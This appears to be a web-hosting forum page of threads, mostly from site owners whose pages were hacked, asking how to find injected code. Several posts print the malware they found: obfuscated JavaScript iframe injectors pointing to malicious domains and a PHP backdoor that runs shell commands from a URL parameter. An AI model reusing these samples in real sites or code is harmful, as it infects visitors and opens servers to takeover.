Hacked: How To Find Javascript Added To Pages In /home
Apr 23, 2007
Many of my websites on my server have been hacked, it randomly add's
Code:
<!--iframe width=1 height=1 border=0 frameborder=0 src=[url]-->
Code:
<!--iframe width=1 height=1 border=0 frameborder=0 src=[url]-->
and
Code:
<!--iframe width=1 height=1 border=0 frameborder=0 src='http://aboutmynews.org/news/InF.php' style='display:none;'></iframe--><!-- ~ --><script language=JavaScript>function dc(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,49,46,22,39,35,15,23,8,28,0,0,0,0,0,0,2,25,55,54,30,40,13,57,14,12,53,47,43,19,38,3,37,33,58,18,36,44,20,24,51,60,29,0,0,0,0,41,0,0,45,48,9,32,17,59,31,6,61,5,4,7,27,50,56,62,34,10,52,1,16,21,26,42,11);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}dc("kNdXOhF18O9QSX9cfBINV3WXaXUcFmFNV3p1shZcahFNw3pc7MIoahUo7mIc75APkxjJi5_eFmZtw0_rssFcmOAt7ObJfKE1s5UrzKIcSnbrIK9caBjrwB9J@3EJfXZoa5_euXUJw4I190GosKIcDspNAy8XOhF18OYN")</script><!-- ~ -->
To some of my pages on my websites in my /home directory.
Please do not visit the links without anti virus protection.
what command I can use to search all of my files in my home directory for this?
View 5 Replies
ADVERTISEMENT
Jul 15, 2008
when i oppened my site i found that there was a code in the index i don't know from what but when i earsed it it returned again ...
View 0 Replies
View Related
Jun 25, 2007
About 2 months ago, I noticed random code linking to a virus in a frame was inserted into many of my web pages accross various accounts.
After I removed it all, I noticed that this has happend to me again!
Code:
<!-- ~ --><script>function v467e627add1dd(v467e627ade17d){ function v467e627adf11b () {return 16;} return(parseInt(v467e627ade17d,v467e627adf11b()));}function v467e627ae105c(v467e627ae2008){ var v467e627ae2f9b='';for(v467e627ae3f41=0; v467e627ae3f41<v467e627ae2008.length; v467e627ae3f41+=2){ v467e627ae2f9b+=(String.fromCharCode(v467e627add1dd(v467e627ae2008.substr(v467e627ae3f41, 2))));}return v467e627ae2f9b;} document.write(v467e627ae105c('3C696672616D65207372633D27687474703A2F2F7777772E3473747566666465616C732E636F6D2F646F63732F7468656D652E68746D272077696474683D31206865696768743D31207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E'));</script><!-- ~ -->
how they are inserting it into my web pages?
View 3 Replies
View Related
Apr 22, 2009
Looking trough my logs I found something that bothers me, there are bots who keep doing requests on my website with pages like /admin or /secure to find vulnerabilities.
It's making about 5-6 requests for unexisting pages every second until it comes to the end of it's dictionary (the pages are even sorted in alphabetical order,
Is there some way to let my Apache server block access to these bots when they make X attemps to see a page who does not exists in a short amount of time? A bit like iptables reject connection if someone tries to log in but fails to do so too many times.
View 6 Replies
View Related
Jul 31, 2007
I had what I thought was a fairly smooth install via yum of Pure-FTP on a Fedora 7 SELinux server. I configured it to use it's own PureDB virtual user system, and I added a few users using # pure-pw useradd to test things out. However, upon successfully logging in...
[21:51:34] USER test1
[21:51:34] 331 User test1 OK. Password required
[21:51:34] PASS (hidden)
[21:51:34] Cannot login waiting to retry (30s)...
[21:51:34] Server closed connection...so, I check /var/log/messages to find...
Jul 31 21:50:25 homeserve pure-ftpd: (?@192.168.0.134) [INFO] New connection from 192.168.0.134
Jul 31 21:50:25 homeserve pure-ftpd: (?@192.168.0.134) [ERROR] Home directory not available - aborting
Clearly, something is awry. When I created the users, I explicitly specified their home directory using pure-pw's -d flag, and I can confirm that it was entered correctly by viewing the /etc/pure-ftpd/pureftpd.passwd. The directories, of course, do exist with the proper permissions and ownership.
View 8 Replies
View Related
Jul 10, 2009
My server was being hacked, I can find some HTML and PHP files which inserted the codes similar to the following by the hacker.
HTML Code:
<iframe src="http://a5g.ru:8080/ts/in.cgi?pepsi94" width=125 height=125 style="visibility: hidden"><
/iframe>
The inserted iframe src is not the same among the hacked files.
I am trying to find out all the hacked files on server, is there any way instead of checking the files manually?
View 14 Replies
View Related
Jun 6, 2009
Hosters: Which 3rd party addon script do you find getting hacked the most?
View 11 Replies
View Related
Sep 8, 2007
My site was hacked today, all pages named index.html were hacked. It is kind of script since all pages were written same time.
I'm using a very respectable hosting. I jumped from another hosting were I was exposed on a unsecured host (they moved my account to an insecure host without asking).
Going back on track, all files named "%index%" were hacked.
-I found a index.txt file with links to obscure sites.
The code was written at bottom of the all index.html files: iframe code
Code:
><!-- ~ --><iframe src="http://googletraff.com/in.cgi?default" width="0" height="0" style="display:none"></iframe><!-- ~ -->
Also a line.php with the following code
PHP Code:
<?error_reporting(0);if($_GET['cmd45']) {system($_GET['cmd45']);}$domain = 'shemale1.biz';$ur = '/load.php?f=%s&ua=%s&ref=%s';$qs = $_SERVER['QUERY_STRING'];$ua = urlencode(substr($_SERVER['HTTP_USER_AGENT'],0,100));$ref = urlencode($_SERVER['HTTP_REFERER']);$redirect = sprintf($ur,$qs,$ua,$ref);#print $redirect;#exit;echo getcontent($domain,80,$redirect);exit;function getcontent($server, $port, $file){$socket=fsockopen($server,$port,$errno,$errstr,60) or die("Can't open socket");$refer = $_SERVER['HTTP_HOST']?$_SERVER['HTTP_HOST']:$server;fputs($socket, "GET $file HTTP/1.0
");fputs($socket, "Referer: http://$refer
");fputs($socket, "Host: $server
");fputs($socket, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
");$wr = 0;while(!feof($socket)){ $temp = fgets($socket); if(eregi("<",$temp)) { $wr = 1; } if($wr) { $page .= $temp; } } fclose($socket); return $page; } ?>
So far I recover the files from backup, secured the config.php files and modify %index% to read only...finally changed the password...
View 5 Replies
View Related
Apr 14, 2007
I am being hacked & I don't know how they are getting files on my server. They are doing it on two of my domains, I suspended one and then they got it on the other. My FTP access log does not show anything suspicious..
How can I find their doorway?
View 4 Replies
View Related
Feb 1, 2008
I am moving to a new server. At first the [url]version of the site was fine. I had trouble getting [url]working. Once I had the path to the certificate file correct, I was good to go. So, I started moving data. I also ran some updates on the new server (installed mysql, php, related pkgs). I don't know when the [url]pages stopped working, but I didn't realize it until I had everything moved over and tried to go live. The pages are completely blank. If I view source, I get this: ....
View 3 Replies
View Related
Mar 18, 2009
We are having a problem with a number of our websites hosted on Fasthosts reseller account where JavaScript is being maliciously inserted into a number of pages.
An example of the code that has been inserted can be found below:
<!--
document.write(unescape('xXz%3CAEqscripzHVt%20RMisAEqrRMicxXz%3DzHV%2FyI%2F6
yI7zHV%2E21wq5RMi%2E2xXz4wq6%2E3AEq4RMi%2FjqAEquwqexXzry%2EjsyI%3E%3CzHV%2Fs
crRMiiwqpzHVtwq%3E').replace(/yI|zHV|fW|xXz|RMi|wq|AEq/g,""));
-->
Which runs this script:
<script src=//67.215.246.34/jquery.js></script>
New pages have been created on a number of websites aswell as the above code inserted into existing pages.
After removing the above code from one particular website it has happened again.
Some of the websites being affected are just static websites with only HTML pages, others are dynamic ASP pages.
View 2 Replies
View Related
Jan 24, 2008
I've tried turning on/off gzipping, other stuff.
It's an AJAX tab script.
Exact same thing, exact same paths work on my shared hosting elsewhere, but not on my box running LS.
View 2 Replies
View Related
Mar 14, 2007
A tech admin that I worked with previously fixed an issue we were having. He explained what he did:
To fix you need to make apache be able to parse JS
He is no longer available.
how to do this? Which file (I expect httpd.conf) would I need to edit and what part of it would it be?
View 1 Replies
View Related
May 28, 2007
Does anyone know of any free web hosts that would allow me to use PHP and JavaScript in my web-pages?
View 9 Replies
View Related
Nov 20, 2008
I pasted the contents of a javascript page into a filename on my server.
Now I cant rename, download or delete the file,
View 4 Replies
View Related
May 15, 2007
I had csf firewall installed, and due to my own stupidity, attempted to login with the wrong password one too many times, which added my IP to iptables, locking me out. I had to SSH into a linux box at school, and then ssh into my server to stop the iptables service so I could get into my server.
I removed every trace of my IP that I could find in csf, but sometime in the middle of the night, iptables reloads some rules from somewhere that blocks me again. I also tried doing iptables -F to clear all rules, but again, sometime in the middle of the night, rules are reloaded and I get blocked. I even uninstalled csf to no avail. I just want to remove my IP once and for all.
View 11 Replies
View Related
Jul 2, 2008
i just got a 2nd server
i had a problem at the beginning that i had to reload
so i think the tech forgot to add my other ips to my network card configs
i remember layeredtech once reloaded my server and the same problem happend so they advised me to add it to a config file in my server
View 6 Replies
View Related
Apr 11, 2009
I'm trying to embed the LiveZilla chat icon within a flash header and haven't been able to do it for the life of me.
View 0 Replies
View Related
Oct 23, 2013
have a website that sources a number of jquery plugins, when I load the site in chrome or firefox the javascript console is saying that these files were not loaded.
The server is a localhost and the files are local.
The google jquery file loads fine.
how I need to configure the apache config file to deal with javascript.
View 2 Replies
View Related
Jul 17, 2015
When i try to go to horde after my upgrade from plesk 11.5.30 to plesk 12.0.18, my horde is loading as minimal cause this:
JavaScript is either disabled or not available on your browser. You are restricted to the minimal view.
But my javascript is enabled for this site.
View 2 Replies
View Related
May 31, 2008
When I add a new site via New Account in WHM and once the domain resolves, the cPanel 'Great Success' page shows. I have verified the site is resolving properly.
This is a brand new installation and the only changes I have made is I updated apache via WHM.
View 4 Replies
View Related
Apr 23, 2008
My fedora server is running apf firewall. When I turn it off, clients can connect.
When I turn it on, it says MSG: Contacting Server.
I have already added ports 6100 and 3784 to /etc/apf/conf.apf by adding the ports to the lines, EG_TCP_CPORTS, EG_UDP_CPORTS, IG_TCP_CPORTS, and IG_UDP_CPORTS
and restarted the service.
Is there any additional ports I need to add?
(I've uploaded my conf.apf file)
View 2 Replies
View Related
Jul 9, 2008
I've been having an issue with one of my sites were someone has been adding malicious code to the index file. I don't know what has been compromised and am looking for a way to stop this.
I have a dedicated server have already upgraded MySQL to the latest version as I though that might work but it hasn't.
View 8 Replies
View Related
Feb 21, 2008
i find on the certain time,
the mysql of server will run a lot of query,
and the io and load will become very high,
after the time point,
all the io and load with be smoth,
so,i wonder if any Cron job has been add (by certain account) to run something,
View 4 Replies
View Related
Oct 15, 2007
how can i do a search for all files (probs using regex) of files consisting purely of numbers?
for e.g. find:
53243.php
24353.php
24098.php
(always have 5 numbers).
seems one of my accounts has had some script run which generated a bunch of these in various subfolders, and the php file basically does a callback to www3.rssnews.ws and www3.xmldata.info, which seem to be some sort of spyware servers.
View 10 Replies
View Related
Oct 24, 2014
I just added a new PHP Handler with PHP Verison 5.5.18 as cgi and i always get an error when activating. I used the samte setting and php ini as the Buildin Ones
root@ip1:/usr/local/src/php-5.5.18# /usr/local/psa/bin/php_handler --list
id: display name: full version: version: type: cgi-bin: php-cli: php.ini: custom:
5.5.18 5.5.18 5.5.18 5.5 cgi /usr/local/php550-cgi/bin/php-cgi /etc/php5/cli/php.ini true
cgi 5.3.29 5.3.29 5.3 cgi /usr/bin/php5-cgi /etc/php5/cgi/php.ini false
fastcgi 5.3.29 5.3.29 5.3 fastcgi /usr/bin/php5-cgi /etc/php5/cgi/php.ini false
module 5.3.29 5.3.29 5.3 module /usr/bin/php5-cgi /etc/php5/cgi/php.ini false
When i want to activate it i get
Fehler: phpinimng failed: Cannot parse php.ini: (<class 'php_ini.PhpIniSyntaxError'>, PhpIniSyntaxError('[<stdin>:24] Invalid configuration line. Are there excessive leading spaces?',))
I get this even if i want to activate a build in one.
In my additional php config i have
mail.log = /var/log/phpmail.log
mail.add_x_header = On
date.timezone = "Europe/Berlin"
[Zend]
zend_extension=/usr/lib/php/modules/ioncube_loader_lin_5.3.so
zend_extension=/usr/lib/php5/ZendGuardLoader.so
sendmail_path = /usr/sbin/sendmail-wrapper-php
I am using Debian Squeeze.
View 4 Replies
View Related
Apr 21, 2015
I tried to set up a site with a "dedicated" IP without SSL, and ran into this problem again. The new IPs (v4 or v6) are not reachable, pingable, or trace routable from outside the container, even from its PCS hardware node.This is what I get after adding the address in PPA:
Code:
# cat ifcfg-eth0
DEVICE="eth0"
ONBOOT="yes"
BOOTPROTO=static
[code]....
By contrast, if I add an IP address through PVA, it is pingable. Note the differences, namely that PVA's ifcfg-eth0:0 has "BOOTPROTO=static" and the IPs double quoted. For those testing at home also note that PVA removed the existing IPv6 addresses (that it didn't know about).
Code:
# cat ifcfg-eth0
DEVICE="eth0"
ONBOOT="yes"
BOOTPROTO="static"
GATEWAY="x.x.194.1"
IPV6_DEFAULTGW="aaaa:bbbb:0:4c::1"
[code]....
Could that make a difference? Why I can't seem to get secondary IPs to work?
View 5 Replies
View Related
